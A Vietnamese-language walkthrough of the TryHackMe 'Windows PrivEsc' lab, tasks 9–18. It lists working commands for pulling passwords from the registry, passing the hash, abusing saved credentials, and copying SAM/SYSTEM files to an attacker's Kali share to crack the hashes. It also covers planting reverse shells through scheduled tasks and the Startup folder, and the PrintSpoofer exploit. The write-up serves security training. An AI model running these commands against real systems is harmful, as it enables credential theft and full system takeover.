Windows PrivEsc - P2 - Tryhackme

Task 9  Passwords - Registry

Vì một số lý do, đôi khi mật khẩu không được lưu trữ trong registry. Trong trường hợp này lab này thì chắc chăn. Nhưng mình vẫn viết cách khai thác nếu trường hợp nào đó có thể khai thác được nó.

Tìm kiếm từ khóa "password" trong registry sử dụng lệnh:

reg query HKLM /f password /t REG_SZ /s

Nếu muốn tiết kiệm thời gian, hãy truy vấn khóa cụ thể này để tìm thông tin đăng nhập  AutoLogon của quản trị viên:

reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"

Trên Kali, sử dụng lệnh winexe để tạo ra một lệnh chạy với các đặc quyền của quản trị viên trên máy  chủ window (cập nhật mật khẩu với mật khẩu nếu tìm thấy):

winexe -U 'admin%password' //MACHINE_IP cmd.exe

Task 10  Passwords - Saved Creds

Liệt kê mọi thông tin đăng nhập đã lưu bằng lệnh: 

cmdkey /list

Lưu ý rằng thông tin xác thực cho người dùng "admin" đã được lưu. Nếu không, hãy chạy tập lệnh C:\PrivEsc\ savecred.bat để làm mới thông tin đăng nhập đã lưu.

Khởi động trình lắng nghe trên Kali và chạy tệp thực thi reverse.exe bằng chạy với thông tin đăng nhập đã lưu của người dùng admin:

runas /savecred /user:admin C:\PrivEsc\reverse.exe

Task 11  Passwords - Security Account Manager (SAM)

Các tệp SAM và SYSTEM có thể được sử dụng để trích xuất các hàm băm mật khẩu của người dùng. Máy ảo này đã lưu trữ các bản sao lưu của các tệp SAM và SYSTEM một cách không an toàn trong thư mục C:\Windows\Repair\

Chuyển các tệp SAM và SYSTEM sang máy ảo Kali để khai thác:

copy C:\Windows\Repair\SAM \\10.10.10.10\kali\       
copy C:\Windows\Repair\SYSTEM \\10.10.10.10\kali\

Trên Kali, tải creddump7 trên git và sử dụng nó để giải mã hàm băm từ các tệp SAM và SYSTEM:

git clone https://github.com/Tib3rius/creddump7      
pip3 install pycrypto                                                          
python3 creddump7/pwdump.py SYSTEM SAM          

Sau khi có được mã hash qua việc giải mã tệp tin trên mình chạy lệnh để tìm ra mật khẩu, dạng hash này là NTLM:

hashcat -m 1000 --force <hash> /usr/share/wordlists/rockyou.txt

Task 12  Passwords - Passing the Hash

Sử dụng hàm băm quản trị viên đầy đủ với pth-winexe để tạo ra một trình kết nối tới máy victim với tư cách quản trị viên mà không cần bẻ khóa mật khẩu của họ. Hãy nhớ hàm băm đầy đủ bao gồm cả băm LM và NTLM, được phân tách bằng dấu hai chấm:

pth-winexe -U 'admin%hash' //MACHINE_IP cmd.exe

Task 13  Scheduled Tasks

Dựa vào lỗi của các task lập lịch chạy tự động để leo thăng

Xem nội dung của tập lệnh C:\DevTools\CleanUp.ps1:

type C:\DevTools\CleanUp.ps1

Tập lệnh này chạy mỗi phút với quyền SYSTEM. Sử dụng accesschk.exe để kiểm tra, lưu ý rằng kihi kiểm tra cần phát hiện có khả năng chỉnh sửa tệp ps1 bằng lệnh:

C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1

Bắt đầu một trình lắng nghe trên Kali và sau đó chỉnh sửa tệp C:\DevTools\CleanUp.ps1 thành tệp reverse.exe mà đã tạo:

echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1

Đợi lịch chạy tasks thực thi sẽ kết nối tới hệ thống victim với quyền NT/SYSTEM

Task 14  Insecure GUI Apps

Liên quan đến điểm yếu của ứng dụng. Ở đây sử dụng RDP để đăng nhập vào victim:

rdesktop -u user -p password321 MACHINE_IP

Nhấp đúp vào "AdminPaint" shortcut trên Desktop của victim. Khi nó đang chạy, hãy mở trình giao diện dòng lệnh để kiểm tra phần mềm Paint có thể chạy với các đặc quyền của quản trị viên, sử dụng lênh sau để kiểm tra :

tasklist /V | findstr mspaint.exe

Khi biết có thể chạy với quyền admin - quản trị viên thực hiện  trong phần mềm Paint đó, bấm "File" > "Open" . Trong hộp thoại, nhấp vào đầu vào điều hướng và dán: file://c:/windows/system32/cmd.exe, xong rồi bấm biếu tượng mũi tên ở cạnh thành công leo thang

Task 15  Startup Apps

Leo thang sử dụng tệp tự động chạy khi khởi động

Sử dụng accesschk.exe kiểm tra, lưu ý rằng nhóm BUILTIN \ Users có thể ghi tệp vào thư mục StartUp:

C:\PrivEsc\accesschk.exe /accepteula -d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"

Sử dụng cscript, chạy tập lệnh C:\PrivEsc\CreateShortcut.vbs sẽ tạo một lối tắt mới cho tệp thực thi reverse.exe của trong thư mục StartUp:

cscript C:\PrivEsc\CreateShortcut.vbs

Khởi động trình lắng nghe kết nối trên Kali, sau đó đăng nhập quản trị bằng RDP và thông tin đăng nhập đã trích xuất trước đó:

rdesktop -u admin MACHINE_IP

Sau khi chạy lệnh này sẽ kích hoạt trình kết nối ngược về máy kali với quyền admin

Task 16  Token Impersonation - Rogue Potato

Cái này rất ít khả năng khai thác được leo thang nên mình không đề cập tới

Task 17  Token Impersonation - PrintSpoofer

Bắt đầu một trình lắng nghe kết nối trên Kali. Mô phỏng thực thi shell bằng một tài khoản chạy dịch vụ sử dụng đăng nhập vào RDP với tư cách người dùng quản trị, mở cửa sổ dòng lệnh nâng cao (nhấp chuột phải -> chạy với tư cách quản trị viên) và sử dụng PSExec64.exe để kích hoạt tệp  reverse.exe mà tạo với quyền của "local service":

C:\PrivEsc\PSExec64.exe -i -u "nt authority\local service" C:\PrivEsc\reverse.exe

Thực hiện bật lắng nghe một cổng khác trên kali

Bây giờ,  với trình kết nối ngược với quyền "local service" mà đã kích hoạt, hãy chạy khai thác PrintSpoofer để kích hoạt trình kết nối ngược thứ hai đang chạy với đặc quyền SYSTEM (cập nhật địa chỉ IP với IP Kali của bạn cho phù hợp):

C:\PrivEsc\PrintSpoofer.exe -c "C:\PrivEsc\reverse.exe" -i

Task 18  Privilege Escalation Scripts

Một số công cụ đã được viết để giúp tìm ra các yêu cầu leo thang đặc quyền tiềm năng trên Windows. Bốn trong số các công cụ này đã được đưa vào victim Windows VM trong thư mục C: \ PrivEsc:

winPEASany.exe

Seatbelt.exe

PowerUp.ps1

SharpUp.exe